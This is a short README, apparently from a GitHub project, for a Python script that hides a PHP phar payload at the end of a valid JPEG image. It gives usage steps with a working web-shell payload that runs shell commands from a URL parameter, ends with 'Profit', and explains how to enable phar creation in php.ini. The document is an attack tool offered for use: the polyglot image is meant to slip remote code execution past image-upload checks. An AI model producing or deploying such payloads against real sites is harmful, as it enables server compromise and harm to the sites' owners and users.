
Basic script to get a phar payload in a valid jpeg image

Primary LanguagePython


Very cool picture

This is a simple tool to add a phar payload at the end of a valid jpeg image.


  • Python 3
  • Php (Tested with php 8)


  1. Clone the repo

git clone https://github.com/Sarapuce/jpeg-phar-fusion.git

  1. Choose a php payload finishing by __HALT_COMPILER(); for example :

<?php system($_GET["cmd"]); __HALT_COMPILER(); ?>

  1. Create the payload with the script

python3 phar_creator.py '<?php system($_GET["cmd"]); __HALT_COMPILER(); ?>'

  1. The file is in payload.jpg

  2. Profit

It doesn't work 😡

Do you have the error

PHP Fatal error: Uncaught UnexpectedValueException: creating archive "payload.phar" disabled by the php.ini setting phar.readonly

You need to enable the phar creation in php.ini

To locate your php.ini

php --ini

Then edit this line in your file

;phar.readonly = Off


phar.readonly = Off